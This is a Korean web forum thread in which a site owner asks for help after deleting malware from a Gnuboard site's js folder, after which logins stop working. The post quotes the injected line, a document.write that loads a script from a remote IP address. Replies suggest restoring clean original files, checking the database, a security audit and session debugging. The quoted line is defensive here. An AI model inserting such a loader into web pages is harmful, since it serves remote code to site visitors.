악성코드 삭제후 로긴이 안됩니다. 정보
악성코드 삭제후 로긴이 안됩니다.관련링크
http://www.myhappybaby.co.kr
117회 연결
본문
며칠 전 악성코드로 고생 좀 했습니다.
이것과 비슷한 증상이었구요.
http://sir.co.kr/bbs/board.php?bo_table=cm_free&wr_id=499969
나름대로 다 뒤져서 지운다고 지웠는데 덜 지워진 모양입니다.
오늘 js폴더에 이상한 게 보여서 모두 지웠습니다.
바로 요거.
document.write("<script src='http://61.57.227.5/js/x.js?GMXZZQ'></script>");
근데 그거 때문인지 모르겠지만.... 로긴이 안됩니다.
관리자도 안되고 아무도 안됩니다.
미치겠어요. 도와주세요.
이것과 비슷한 증상이었구요.
http://sir.co.kr/bbs/board.php?bo_table=cm_free&wr_id=499969
나름대로 다 뒤져서 지운다고 지웠는데 덜 지워진 모양입니다.
오늘 js폴더에 이상한 게 보여서 모두 지웠습니다.
바로 요거.
document.write("<script src='http://61.57.227.5/js/x.js?GMXZZQ'></script>");
근데 그거 때문인지 모르겠지만.... 로긴이 안됩니다.
관리자도 안되고 아무도 안됩니다.
미치겠어요. 도와주세요.
댓글 전체
js폴더가 로긴 쿠키 관련 파일이 들어있죠.
그것 때문에 로긴이 안되는 거 같은데...
js폴더 안에 파일에 권한설정이 안되서
모두 다운받아 수정 후 다시 올렸는데 그 과정에서 문제가 생긴 게 아닐까요.
그것 때문에 로긴이 안되는 거 같은데...
js폴더 안에 파일에 권한설정이 안되서
모두 다운받아 수정 후 다시 올렸는데 그 과정에서 문제가 생긴 게 아닐까요.
저는 db에도 있어 지웠는데.로그인하고는 문제가 없었습니다.
다시 백업 올린후 하나하나 지워보시고 db에도 잇으니 한곳이던데 위치가 기억이 안나네요
그것도 지우시면 될것 같은데
다시 백업 올린후 하나하나 지워보시고 db에도 잇으니 한곳이던데 위치가 기억이 안나네요
그것도 지우시면 될것 같은데
DB에 있다면 데이타값으로 들어있다는 것인가요.
아니면 필드명으로?
아니면 필드명으로?
데이터 값아닐까요?
디비에 있는 건 삭제된 거 같습니다.
로긴이나 자동로긴과 관련된 파일은 어느 것이 있나요.
그 파일들을 살펴봐야 할 거 같은데요.
로긴이나 자동로긴과 관련된 파일은 어느 것이 있나요.
그 파일들을 살펴봐야 할 거 같은데요.
초보지만 이해가 안되네요...
js같은화일은
그게 그누기본화일이면.....
그누원본을 그냥 올리시지.....그걸 수정해서 올리다니.....
특히 제이쿼리같은경우는 손잘못대면.....작동을 안하잖아요....
js같은화일은
그게 그누기본화일이면.....
그누원본을 그냥 올리시지.....그걸 수정해서 올리다니.....
특히 제이쿼리같은경우는 손잘못대면.....작동을 안하잖아요....
악성코드가 심어져 있어서 삭제한 거에요.
js는 그누기본화일인데......그걸 수정하는 수고보다 ....
통째로 깨끗한것을 올리는게 좋으니 그런겁니다....
그런화일은 거의수정하지 않잖아요.....
만약수정했다면 수정한것만 수정하면 되잖아요???
통째로 깨끗한것을 올리는게 좋으니 그런겁니다....
그런화일은 거의수정하지 않잖아요.....
만약수정했다면 수정한것만 수정하면 되잖아요???
그런가요. 어디에 수정되어 있는지 몰라서 그랬는데.....
원본을 한번 올려봐야겠네요.
원본을 한번 올려봐야겠네요.
원본 올려도 마찬가지네요.
로그인이 안되는 문제와 관련된 이야기는 아닌데
js 파일이 변경되었으면
서버 db 설정파일(관리자암호) 등 까지 이미 다 털리신거라고 보셔야합니다.
서버 관리자 이야기해서 보안점검 해두세요
로그인 과정은
1. 로그인 아이디 비밀번호가 정상적으로 넘어오는지 테스트 하시고
2. common.php 에서
로그인 전후로 var_dump($_SESSION);
해보셔서 세션 값 제대로 설정되는지 확인해보셔야 할것 같네요
js 파일이 변경되었으면
서버 db 설정파일(관리자암호) 등 까지 이미 다 털리신거라고 보셔야합니다.
서버 관리자 이야기해서 보안점검 해두세요
로그인 과정은
1. 로그인 아이디 비밀번호가 정상적으로 넘어오는지 테스트 하시고
2. common.php 에서
로그인 전후로 var_dump($_SESSION);
해보셔서 세션 값 제대로 설정되는지 확인해보셔야 할것 같네요